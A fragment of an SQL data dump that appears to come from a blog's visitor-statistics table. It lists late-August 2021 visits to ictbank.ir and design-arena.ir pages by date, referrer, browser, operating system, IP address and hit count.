(13028,'2021-08-21','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','107.150.70.214','000',0,2,0),
(13029,'2021-08-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.32.32.57','000',0,2,0),
(13030,'2021-08-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','85.254.72.27','000',0,2,0),
(13031,'2021-08-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(13032,'2021-08-21','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','81.26.205.172','000',0,2,0),
(13033,'2021-08-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(13034,'2021-08-21','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','198.204.238.212','000',0,2,0),
(13035,'2021-08-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,2,0),
(13036,'2021-08-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','167.71.11.97','000',0,1,0),
(13037,'2021-08-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,1,0),
(13038,'2021-08-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(13039,'2021-08-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(13040,'2021-08-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(13041,'2021-08-22','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','201.210.244.18','000',0,2,0),
(13042,'2021-08-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','172.94.9.23','000',0,2,0),
(13043,'2021-08-22','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','95.38.34.18','000',0,4,0),
(13044,'2021-08-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(13045,'2021-08-22','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','78.162.62.73','000',0,2,0),
(13046,'2021-08-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.22','000',0,2,0),
(13047,'2021-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.82.169','000',0,2,0),
(13048,'2021-08-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(13049,'2021-08-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(13050,'2021-08-22','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.118.254.197','000',0,1,0),
(13051,'2021-08-22','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','185.191.34.215','000',0,1,0),
(13052,'2021-08-22','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.45.77.102','000',0,2,0),
(13053,'2021-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.238.196','000',0,1,0),
(13054,'2021-08-22','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,2,0),
(13055,'2021-08-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(13056,'2021-08-22','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','42.106.180.237','000',0,2,0),
(13057,'2021-08-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(13058,'2021-08-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(13059,'2021-08-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(13060,'2021-08-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,1,0),
(13061,'2021-08-22','http://www.bing.com/search?q=Warning%3A+mysqli_connect()%3A+The+server+requested+authentication+method+unknown+to+the+client+%5Bsha256_password%5D&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','Internet Explorer','Windows','6.1',NULL,NULL,'','23.100.232.233','000',0,1,0),
(13062,'2021-08-22','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','92.204.174.134','000',0,2,0),
(13063,'2021-08-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(13064,'2021-08-23','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','23.100.232.233','000',0,1,0),
(13065,'2021-08-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,11,0),
(13066,'2021-08-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(13067,'2021-08-23','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','113.160.115.1','000',0,2,0),
(13068,'2021-08-23','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','152.32.216.61','000',0,10,0),
(13069,'2021-08-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.45.77.102','000',0,1,0),
(13070,'2021-08-23','anonymousfox.co','Chrome','Windows','10.0',NULL,NULL,'','212.192.246.138','000',0,1,0),
(13071,'2021-08-23','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,1,0),
(13072,'2021-08-23','http://ictbank.ir/','Chrome','Windows','6.1',NULL,NULL,'','46.105.85.31','000',0,1,0),
(13073,'2021-08-23','http://ictbank.ir/blog/wp-comments-post.php','Chrome','Windows','6.1',NULL,NULL,'','181.177.85.231','000',0,2,0),
(13074,'2021-08-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.239.23','000',0,2,0),
(13075,'2021-08-23','http://ictbank.ir/blog','2345 Explorer','Windows','6.1',NULL,NULL,'','181.177.87.16','000',0,1,0),
(13076,'2021-08-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.166.208.25','000',0,1,0),
(13077,'2021-08-23','https://www.google.com/','Firefox','OS X','10.15',NULL,NULL,'','82.119.9.136','000',0,1,0),
(13078,'2021-08-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.191.188','000',0,1,0),
(13079,'2021-08-23','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','197.251.229.94','000',0,2,0),
(13080,'2021-08-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.94.121.135','000',0,2,0),
(13081,'2021-08-23','http://ictbank.ir/blog','Unknown','Windows','10.0',NULL,NULL,'','185.253.97.235','000',0,4,0),
(13082,'2021-08-23','http://82.102.9.14/blog','Unknown','Android','10',NULL,NULL,'','212.129.152.41','000',0,2,0),
(13083,'2021-08-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(13084,'2021-08-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(13085,'2021-08-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(13086,'2021-08-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(13087,'2021-08-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','196.242.20.59','000',0,2,0),
(13088,'2021-08-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.46.201.116','000',0,2,0),
(13089,'2021-08-23','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','23.95.237.220','000',0,13,0),
(13090,'2021-08-23','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','107.174.150.140','000',0,2,0),
(13091,'2021-08-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(13092,'2021-08-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.149.132.238','000',0,2,0),
(13093,'2021-08-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','196.240.237.59','000',0,2,0),
(13094,'2021-08-24','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','23.95.204.148','000',0,13,0),
(13095,'2021-08-24','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','196.19.240.101','000',0,2,0),
(13096,'2021-08-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','20.199.49.129','000',0,2,0),
(13097,'2021-08-24','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','23.100.232.233','000',0,1,0),
(13098,'2021-08-24','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','92.209.2.181','000',0,2,0),
(13099,'2021-08-24','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
(13100,'2021-08-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.20','000',0,2,0),
(13101,'2021-08-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.232.31','000',0,2,0),
(13102,'2021-08-24','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.90.71','000',0,1,0),
(13103,'2021-08-24','http://design-arena.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.90.59','000',0,1,0),
(13104,'2021-08-24','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','202.179.24.238','000',0,2,0),
(13105,'2021-08-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','80.82.77.33','000',0,2,0),
(13106,'2021-08-24','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','198.204.238.212','000',0,2,0),
(13107,'2021-08-24','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','178.22.195.208','000',0,2,0),
(13108,'2021-08-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.225.115','000',0,1,0),
(13109,'2021-08-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,5,0),
(13110,'2021-08-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.94.121.135','000',0,2,0),
(13111,'2021-08-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.166.200.18','000',0,1,0),
(13112,'2021-08-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(13113,'2021-08-24','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','5.62.49.94','000',0,5,0),
(13114,'2021-08-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,2,0),
(13115,'2021-08-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(13116,'2021-08-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,1,0),
(13117,'2021-08-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','162.55.190.30','000',0,1,0),
(13118,'2021-08-24','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','94.155.33.88','000',0,5,0),
(13119,'2021-08-25','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','173.252.87.117','000',0,1,0),
(13120,'2021-08-25','http://www.ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','137.74.24.99','000',0,2,0),
(13121,'2021-08-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','69.171.251.2','000',0,1,0),
(13122,'2021-08-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.95.202.98','000',0,2,0),
(13123,'2021-08-25','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','23.100.232.233','000',0,2,0),
(13124,'2021-08-25','http://design-arena.ir/blog','Chrome','Android','8.0.0',NULL,NULL,'','162.55.190.106','000',0,2,0),
(13125,'2021-08-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(13126,'2021-08-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(13127,'2021-08-25','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','118.107.92.7','000',0,2,0),
(13128,'2021-08-25','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','54.159.59.81','000',0,2,0),
(13129,'2021-08-25','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,3,0),
(13130,'2021-08-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(13131,'2021-08-25','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','194.93.1.43','000',0,14,0),
(13132,'2021-08-25','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','106.13.195.108','000',0,2,0),
(13133,'2021-08-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.114.219','000',0,2,0),
(13134,'2021-08-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(13135,'2021-08-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','157.230.109.157','000',0,1,0),
(13136,'2021-08-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.69.156.35','000',0,1,0),
(13137,'2021-08-25','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','152.231.29.102','000',0,2,0),
(13138,'2021-08-25','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','167.114.5.51','000',0,3,0),
(13139,'2021-08-25','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,1,0),
(13140,'2021-08-25','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(13141,'2021-08-25','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','200.137.171.1','000',0,4,0),
(13142,'2021-08-25','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','116.111.228.37','000',0,2,0),
(13143,'2021-08-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.209.197.14','000',0,1,0),
(13144,'2021-08-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(13145,'2021-08-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(13146,'2021-08-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(13147,'2021-08-25','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','137.59.110.47','000',0,4,0),
(13148,'2021-08-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','79.173.188.12','000',0,1,0),
(13149,'2021-08-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,2,0),
(13150,'2021-08-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(13151,'2021-08-26','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','8.21.11.114','000',0,2,0),
(13152,'2021-08-26','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,2,0),
(13153,'2021-08-26','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','54.218.1.89','000',0,2,0),
(13154,'2021-08-26','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','52.12.167.91','000',0,1,0),
(13155,'2021-08-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.149.41.243','000',0,2,0),
(13156,'2021-08-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.144.176.169','000',0,2,0),
(13157,'2021-08-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.227.107.188','000',0,2,0),
(13158,'2021-08-26','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.66.17','000',0,1,0),
(13159,'2021-08-26','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','159.69.58.136','000',0,2,0),
(13160,'2021-08-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,3,0),
(13161,'2021-08-26','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','52.10.186.243','000',0,2,0),
(13162,'2021-08-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.94.121.135','000',0,2,0),
(13163,'2021-08-26','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','54.202.174.107','000',0,1,0),
(13164,'2021-08-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.11.56.133','000',0,1,0),
(13165,'2021-08-26','http://ictbank.ir/blog','Unknown','Debian','1.7.8',NULL,NULL,'','88.198.31.238','000',0,2,0),
(13166,'2021-08-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(13167,'2021-08-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','39.101.168.207','000',0,1,0),
(13168,'2021-08-26','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','85.159.213.129','000',0,2,0),
(13169,'2021-08-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(13170,'2021-08-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(13171,'2021-08-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(13172,'2021-08-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(13173,'2021-08-26','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','85.100.72.195','000',0,2,0),
(13174,'2021-08-26','http://ictbank.ir/blog','Unknown','Windows','10.0',NULL,NULL,'','185.253.97.235','000',0,4,0),
(13175,'2021-08-26','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','81.69.191.124','000',0,2,0),
(13176,'2021-08-26','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','188.162.140.237','000',0,2,0),
(13177,'2021-08-27','http://82.102.9.14:80/','Chrome','Windows','10.0',NULL,NULL,'','45.61.185.125','000',0,1,0),
(13178,'2021-08-27','http://82.102.9.14:80/','Chrome','Windows','10.0',NULL,NULL,'','89.163.252.230','000',0,1,0),
(13179,'2021-08-27','http://82.102.9.14:80/','Firefox','Windows','10.0',NULL,NULL,'','185.220.100.250','000',0,2,0),
(13180,'2021-08-27','http://82.102.9.14:80/','Internet Explorer','Windows','6.1',NULL,NULL,'','45.153.160.136','000',0,2,0),
(13181,'2021-08-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,3,0),
(13182,'2021-08-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(13183,'2021-08-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(13184,'2021-08-27','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','222.77.181.28','000',0,4,0),
(13185,'2021-08-27','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','115.79.42.39','000',0,1,0),
(13186,'2021-08-27','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,2,0),
(13187,'2021-08-27','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','74.91.26.26','000',0,93,0),
(13188,'2021-08-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.73.67','000',0,2,0),
(13189,'2021-08-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(13190,'2021-08-27','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','176.74.192.85','000',0,1,0),
(13191,'2021-08-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(13192,'2021-08-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.40.113.31','000',0,2,0),
(13193,'2021-08-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.27.164.26','000',0,1,0),
(13194,'2021-08-27','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','36.73.130.34','000',0,2,0),
(13195,'2021-08-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','46.8.19.54','000',0,2,0),
(13196,'2021-08-27','http://ictbank.ir/blog','Chrome','OpenBSD','',NULL,NULL,'','143.244.41.201','000',0,2,0),
(13197,'2021-08-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','3.238.222.92','000',0,2,0),
(13198,'2021-08-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(13199,'2021-08-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.200.42','000',0,1,0),
(13200,'2021-08-27','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','54.88.125.181','000',0,1,0),
(13201,'2021-08-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.3.62','000',0,1,0),
(13202,'2021-08-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(13203,'2021-08-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,2,0),
(13204,'2021-08-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','125.113.6.107','000',0,1,0),
(13205,'2021-08-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.94.121.135','000',0,2,0),
(13206,'2021-08-27','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.14','000',0,3,0),
(13207,'2021-08-28','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.235','000',0,1,0),
(13208,'2021-08-28','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','112.78.156.28','000',0,1,0),
(13209,'2021-08-28','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.188','000',0,1,0),
(13210,'2021-08-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.195.221.10','000',0,10,0),
(13211,'2021-08-28','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','117.4.99.116','000',0,2,0),
(13212,'2021-08-28','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.175','000',0,1,0),
(13213,'2021-08-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(13214,'2021-08-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(13215,'2021-08-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.223.238.3','000',0,2,0),
(13216,'2021-08-28','http://ictbank.ir/blog','Maxthon','Windows','6.1',NULL,NULL,'','185.65.134.176','000',0,1,0),
(13217,'2021-08-28','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
(13218,'2021-08-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(13219,'2021-08-28','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.65.134.178','000',0,2,0),
(13220,'2021-08-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.24.132.145','000',0,1,0),
(13221,'2021-08-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(13222,'2021-08-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.204.119','000',0,1,0),
(13223,'2021-08-28','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','3.238.222.92','000',0,1,0),
(13224,'2021-08-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(13225,'2021-08-28','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','82.174.127.246','000',0,2,0),
(13226,'2021-08-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.241','000',0,1,0),
(13227,'2021-08-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.3.62','000',0,1,0),
(13228,'2021-08-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(13229,'2021-08-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(13230,'2021-08-28','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.238.66.24','000',0,1,0),
(13231,'2021-08-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(13232,'2021-08-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(13233,'2021-08-29','http://design-arena.ir/blog','Chrome','Android','7.0',NULL,NULL,'','124.126.78.192','000',0,2,0),
(13234,'2021-08-29','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.146','000',0,2,0),
(13235,'2021-08-29','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','62.162.54.3','000',0,2,0),
(13236,'2021-08-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(13237,'2021-08-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.234.83','000',0,2,0),
(13238,'2021-08-29','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','44.197.171.129','000',0,1,0),
(13239,'2021-08-29','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','113.160.234.178','000',0,2,0),
(13240,'2021-08-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(13241,'2021-08-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.40.190.51','000',0,1,0),
(13242,'2021-08-29','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
(13243,'2021-08-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','167.71.11.97','000',0,1,0),
(13244,'2021-08-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.241','000',0,1,0),
(13245,'2021-08-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(13246,'2021-08-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(13247,'2021-08-29','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','189.14.206.234','000',0,2,0),
(13248,'2021-08-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(13249,'2021-08-30','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','192.15.29.190','000',0,1,0),
(13250,'2021-08-30','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','79.112.53.50','000',0,2,0),
